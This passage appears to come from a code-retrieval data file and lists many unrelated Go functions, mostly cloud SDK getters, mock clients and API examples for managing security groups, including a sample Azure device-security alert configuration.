Policies list: %v\", err)\n\t}\n\treturn sgplist, nil\n}", "func ParseListSecurityGroupsResponse(rsp *http.Response) (*ListSecurityGroupsResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &ListSecurityGroupsResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest struct {\n\t\t\tSecurityGroups *[]SecurityGroup `json:\"security-groups,omitempty\"`\n\t\t}\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func (s *SubnetListener) ListSecurityGroups(inctx context.Context, in *protocol.SecurityGroupSubnetBindRequest) (_ *protocol.SecurityGroupBondsResponse, err error) {\n\tdefer fail.OnExitConvertToGRPCStatus(inctx, &err)\n\tdefer fail.OnExitLogError(inctx, &err)\n\tdefer fail.OnExitWrapError(inctx, &err, \"cannot list Security Groups bound to Subnet\")\n\n\tif s == nil {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif in == nil {\n\t\treturn nil, fail.InvalidParameterError(\"in\", \"cannot be nil\")\n\t}\n\tif inctx == nil {\n\t\treturn nil, fail.InvalidParameterError(\"inctx\", \"cannot be nil\")\n\t}\n\n\tnetworkRef, _ := srvutils.GetReference(in.GetNetwork())\n\tsubnetRef, _ := srvutils.GetReference(in.GetSubnet())\n\tif subnetRef == \"\" {\n\t\treturn nil, fail.InvalidRequestError(\"neither name nor id given as reference for Subnet\")\n\t}\n\n\tjob, xerr := PrepareJob(inctx, in.GetNetwork().GetTenantId(), fmt.Sprintf(\"network/%s/subnet/%s/securitygroups/list\", networkRef, subnetRef))\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\tdefer job.Close()\n\n\tstate := securitygroupstate.Enum(in.GetState())\n\n\thandler := handlers.NewSubnetHandler(job)\n\tbonds, xerr := handler.ListSecurityGroups(networkRef, subnetRef, state)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\tresp := converters.SecurityGroupBondsFromPropertyToProtocol(bonds, \"subnets\")\n\treturn resp, nil\n}", "func (o *FiltersSecurityGroup) GetDescriptionsOk() (*[]string, bool) {\n\tif o == nil || o.Descriptions == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Descriptions, true\n}", "func (o *GetSecurityGroupInternalServerError) IsSuccess() bool {\n\treturn false\n}", "func (o *CreateLoadBalancerRequest) SetSecurityGroups(v []string) {\n\to.SecurityGroups = &v\n}", "func (o *VirtualMachineToAlternativeRestoreOptions) GetNetworkSecurityGroupIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.NetworkSecurityGroupId, true\n}", "func NewGetSecurityGroupOK() *GetSecurityGroupOK {\n\treturn &GetSecurityGroupOK{}\n}", "func (o *User) GetSchoolsOk() ([]string, bool) {\n\tif o == nil || o.Schools == nil {\n\t\tvar ret []string\n\t\treturn ret, false\n\t}\n\treturn *o.Schools, true\n}", "func (o *FiltersSecurityGroup) GetNetIdsOk() (*[]string, bool) {\n\tif o == nil || o.NetIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetIds, true\n}", "func (o *SecurityGroup) HasSecurityGroupName() bool {\n\tif o != nil && o.SecurityGroupName != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupNames() []string {\n\tif o == nil || o.SecurityGroupNames == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupNames\n}", "func (o *FiltersVmGroup) GetSecurityGroupIds() []string {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupIds\n}", "func (o *SecurityGroup) GetTagsOk() (*[]ResourceTag, bool) {\n\tif o == nil || o.Tags == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Tags, true\n}", "func (m *Group) GetSecurityEnabled()(*bool) {\n return m.securityEnabled\n}", "func (m *MockClient) DescribeSecurityGroups(arg0 *ec2.DescribeSecurityGroupsInput) (*ec2.DescribeSecurityGroupsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DescribeSecurityGroups\", arg0)\n\tret0, _ := ret[0].(*ec2.DescribeSecurityGroupsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (o *FeedSyncResult) GetGroupsOk() ([]GroupSyncResult, bool) {\n\tif o == nil || o.Groups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Groups, true\n}", "func (c *Client) BindSecurityGroups(args *BindSecurityGroupsArgs) error {\n\tjsonBytes, jsonErr := json.Marshal(args)\n\tif jsonErr != nil {\n\t\treturn jsonErr\n\t}\n\tbody, err := bce.NewBodyFromBytes(jsonBytes)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn BindSecurityGroups(c, body)\n}", "func (c *MockNetworkSecurityGroupsClient) List(ctx context.Context, resourceGroupName string) ([]network.SecurityGroup, error) {\n\tvar l []network.SecurityGroup\n\tfor _, nsg := range c.NSGs {\n\t\tl = append(l, nsg)\n\t}\n\treturn l, nil\n}", "func ExampleRDS_DescribeDBSecurityGroups_shared00() {\n\tsvc := rds.New(session.New())\n\tinput := &rds.DescribeDBSecurityGroupsInput{\n\t\tDBSecurityGroupName: aws.String(\"mydbsecuritygroup\"),\n\t}\n\n\tresult, err := svc.DescribeDBSecurityGroups(input)\n\tif err != nil {\n\t\tif aerr, ok := err.(awserr.Error); ok {\n\t\t\tswitch aerr.Code() {\n\t\t\tcase rds.ErrCodeDBSecurityGroupNotFoundFault:\n\t\t\t\tfmt.Println(rds.ErrCodeDBSecurityGroupNotFoundFault, aerr.Error())\n\t\t\tdefault:\n\t\t\t\tfmt.Println(aerr.Error())\n\t\t\t}\n\t\t} else {\n\t\t\t// Print the error, cast err to awserr.Error to get the Code and\n\t\t\t// Message from an error.\n\t\t\tfmt.Println(err.Error())\n\t\t}\n\t\treturn\n\t}\n\n\tfmt.Println(result)\n}", "func (c *Client) ListSecurityGroups(ctx context.Context, zone string) ([]*SecurityGroup, error) {\n\tlist := make([]*SecurityGroup, 0)\n\n\tresp, err := c.ListSecurityGroupsWithResponse(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif resp.JSON200.SecurityGroups != nil {\n\t\tfor i := range *resp.JSON200.SecurityGroups {\n\t\t\tsecurityGroup := securityGroupFromAPI(&(*resp.JSON200.SecurityGroups)[i])\n\t\t\tsecurityGroup.c = c\n\t\t\tsecurityGroup.zone = zone\n\n\t\t\tlist = append(list, securityGroup)\n\t\t}\n\t}\n\n\treturn list, nil\n}", "func NewListSecurityGroupsRequest(server string) (*http.Request, error) {\n\tvar err error\n\n\tqueryUrl, err := url.Parse(server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbasePath := fmt.Sprintf(\"/security-group\")\n\tif basePath[0] == '/' {\n\t\tbasePath = basePath[1:]\n\t}\n\n\tqueryUrl, err = queryUrl.Parse(basePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq, err := http.NewRequest(\"GET\", queryUrl.String(), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn req, nil\n}", "func (mr *MockSecurityGroupServiceIfaceMockRecorder) ListSecurityGroups(p interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListSecurityGroups\", reflect.TypeOf((*MockSecurityGroupServiceIface)(nil).ListSecurityGroups), p)\n}", "func (o *FiltersSecurityGroup) GetTagsOk() (*[]string, bool) {\n\tif o == nil || o.Tags == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Tags, true\n}", "func ExampleDeviceSecurityGroupsClient_Get() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armsecurity.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewDeviceSecurityGroupsClient().Get(ctx, \"subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub\", \"samplesecuritygroup\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.DeviceSecurityGroup = armsecurity.DeviceSecurityGroup{\n\t// \tName: to.Ptr(\"samplesecuritygroup\"),\n\t// \tType: to.Ptr(\"Microsoft.Security/deviceSecurityGroups\"),\n\t// \tID: to.Ptr(\"/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub/providers/Microsoft.Security/deviceSecurityGroups/samplesecuritygroup\"),\n\t// \tProperties: &armsecurity.DeviceSecurityGroupProperties{\n\t// \t\tAllowlistRules: []armsecurity.AllowlistCustomAlertRuleClassification{\n\t// \t\t\t&armsecurity.ConnectionToIPNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when an outbound connection is created between your device and an ip that isn't allowed\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Outbound connection to an ip that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ConnectionToIpNotAllowed\"),\n\t// \t\t\t\tValueType: to.Ptr(armsecurity.ValueTypeIPCidr),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.LocalUserNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when a local user that isn't allowed logins to the device\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Login by a local user that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"LocalUserNotAllowed\"),\n\t// \t\t\t\tValueType: to.Ptr(armsecurity.ValueTypeString),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.ProcessNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when a process that isn't allowed is executed\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Execution of a process that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ProcessNotAllowed\"),\n\t// \t\t\t\tValueType: to.Ptr(armsecurity.ValueTypeString),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t}},\n\t// \t\tDenylistRules: []*armsecurity.DenylistCustomAlertRule{\n\t// \t\t},\n\t// \t\tThresholdRules: []armsecurity.ThresholdCustomAlertRuleClassification{\n\t// \t\t},\n\t// \t\tTimeWindowRules: []armsecurity.TimeWindowCustomAlertRuleClassification{\n\t// \t\t\t&armsecurity.ActiveConnectionsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of active connections of a device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of active connections is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ActiveConnectionsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (AMQP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (MQTT protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (HTTP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (AMQP protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (MQTT protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (HTTP protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (AMQP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (MQTT protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (HTTP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.DirectMethodInvokesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of direct method invokes in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of direct method invokes is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"DirectMethodInvokesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.FailedLocalLoginsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of failed local logins on the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of failed local logins is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"FailedLocalLoginsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.FileUploadsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of file uploads from the device to the cloud in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of file uploads is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"FileUploadsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.QueuePurgesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device queue purges in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device queue purges is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"QueuePurgesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.TwinUpdatesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of twin updates (by the device or the service) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of twin updates is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"TwinUpdatesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.UnauthorizedOperationsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number unauthorized operations in the time window is not in the allowed range. Unauthorized operations are operations that affect the device (or done by it) that fail because of an unauthorized error\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of unauthorized operations is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"UnauthorizedOperationsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t}},\n\t// \t},\n\t// }\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupIds() []string {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupIds\n}", "func (o *HoldingsOverride) GetSecurityOk() (*SecurityOverride, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Security, true\n}", "func (o *NetgroupsSettingsCollectionGetOK) IsSuccess() bool {\n\treturn true\n}", "func (*ListSecurityGroupsResponse) Descriptor() ([]byte, []int) {\n\treturn file_yandex_cloud_vpc_v1_security_group_service_proto_rawDescGZIP(), []int{2}\n}", "func (o *SecurityGroup) GetInboundRulesOk() (*[]SecurityGroupRule, bool) {\n\tif o == nil || o.InboundRules == nil {\n\t\treturn nil, false\n\t}\n\treturn o.InboundRules, true\n}", "func GetUserGroups(r *http.Request) map[string]bool {\n\tif r.Context().Value(GroupCtxKey) != nil {\n\t\treturn r.Context().Value(GroupCtxKey).(map[string]bool)\n\t}\n\n\treturn nil\n}", "func (o *EventAttributes) GetMonitorGroupsOk() (*[]string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.MonitorGroups.Get(), o.MonitorGroups.IsSet()\n}", "func (o *GetSecurityGroupConflict) IsSuccess() bool {\n\treturn false\n}", "func (o *PcloudVolumegroupsGetOK) IsSuccess() bool {\n\treturn true\n}", "func ExampleDeviceSecurityGroupsClient_Get() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclient, err := armsecurity.NewDeviceSecurityGroupsClient(cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := client.Get(ctx,\n\t\t\"subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub\",\n\t\t\"samplesecuritygroup\",\n\t\tnil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// TODO: use response item\n\t_ = res\n}", "func (o ClusterOutput) SecurityGroupNames() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Cluster) pulumi.StringArrayOutput { return v.SecurityGroupNames }).(pulumi.StringArrayOutput)\n}", "func (s *DefaultSpaceSettings) SetSecurityGroups(v []*string) *DefaultSpaceSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o *SamlConfigurationProperties) GetDefaultGroupsOk() (*SamlConfigurationPropertyItemsArray, bool) {\n\tif o == nil || o.DefaultGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.DefaultGroups, true\n}", "func (o *W2) GetSocialSecurityWagesOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SocialSecurityWages.Get(), o.SocialSecurityWages.IsSet()\n}", "func (o *W2) GetSocialSecurityTipsOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SocialSecurityTips.Get(), o.SocialSecurityTips.IsSet()\n}", "func (a *Client) ListOpenstackSecurityGroupsNoCredentialsV2(params *ListOpenstackSecurityGroupsNoCredentialsV2Params, authInfo runtime.ClientAuthInfoWriter, opts ...ClientOption) (*ListOpenstackSecurityGroupsNoCredentialsV2OK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewListOpenstackSecurityGroupsNoCredentialsV2Params()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"listOpenstackSecurityGroupsNoCredentialsV2\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v2/projects/{project_id}/clusters/{cluster_id}/providers/openstack/securitygroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &ListOpenstackSecurityGroupsNoCredentialsV2Reader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsuccess, ok := result.(*ListOpenstackSecurityGroupsNoCredentialsV2OK)\n\tif ok {\n\t\treturn success, nil\n\t}\n\t// unexpected success response\n\tunexpectedSuccess := result.(*ListOpenstackSecurityGroupsNoCredentialsV2Default)\n\treturn nil, runtime.NewAPIError(\"unexpected success response: content available as default response in error\", unexpectedSuccess, unexpectedSuccess.Code())\n}", "func (o *MicrosoftGraphEducationUser) GetSchoolsOk() ([]MicrosoftGraphEducationSchool, bool) {\n\tif o == nil || o.Schools == nil {\n\t\tvar ret []MicrosoftGraphEducationSchool\n\t\treturn ret, false\n\t}\n\treturn *o.Schools, true\n}", "func (c *MockNetworkSecurityGroupsClient) Get(ctx context.Context, resourceGroupName string, nsgName string) (*network.SecurityGroup, error) {\n\tasg, ok := c.NSGs[nsgName]\n\tif !ok {\n\t\treturn nil, nil\n\t}\n\treturn &asg, nil\n}", "func (o *ListServerGroupOK) IsSuccess() bool {\n\treturn true\n}", "func (o *MemoryPersistentMemoryConfiguration) GetSecurityStateOk() (*string, bool) {\n\tif o == nil || o.SecurityState == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityState, true\n}", "func (o *ListServerGroupBadRequest) IsSuccess() bool {\n\treturn false\n}", "func (c *Client) ListKubernetesSecurityGroups(ctx context.Context, vpcID, clusterName string) ([]string, error) {\n\tgroups, err := c.EC2.DescribeSecurityGroupsWithContext(ctx, &ec2.DescribeSecurityGroupsInput{\n\t\tFilters: []*ec2.Filter{\n\t\t\t{\n\t\t\t\tName: aws.String(\"vpc-id\"),\n\t\t\t\tValues: []*string{aws.String(vpcID)},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: aws.String(\"tag-key\"),\n\t\t\t\tValues: []*string{aws.String(fmt.Sprintf(\"kubernetes.io/cluster/%s\", clusterName))},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: aws.String(\"tag-value\"),\n\t\t\t\tValues: []*string{aws.String(\"owned\")},\n\t\t\t},\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar results []string\n\tfor _, group := range groups.SecurityGroups {\n\t\tresults = append(results, *group.GroupId)\n\t}\n\n\treturn results, nil\n}", "func (o *SecurityGroup) GetSecurityGroupId() string {\n\tif o == nil || o.SecurityGroupId == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupId\n}", "func GetSecurityGroupConfig(s *ec2.SecurityGroup) []AWSResourceConfig {\n\tcf := SecurityGroupConfig{\n\t\tConfig: Config{\n\t\t\tName: s.GroupName,\n\t\t\tTags: s.Tags,\n\t\t},\n\t\tGroupName: 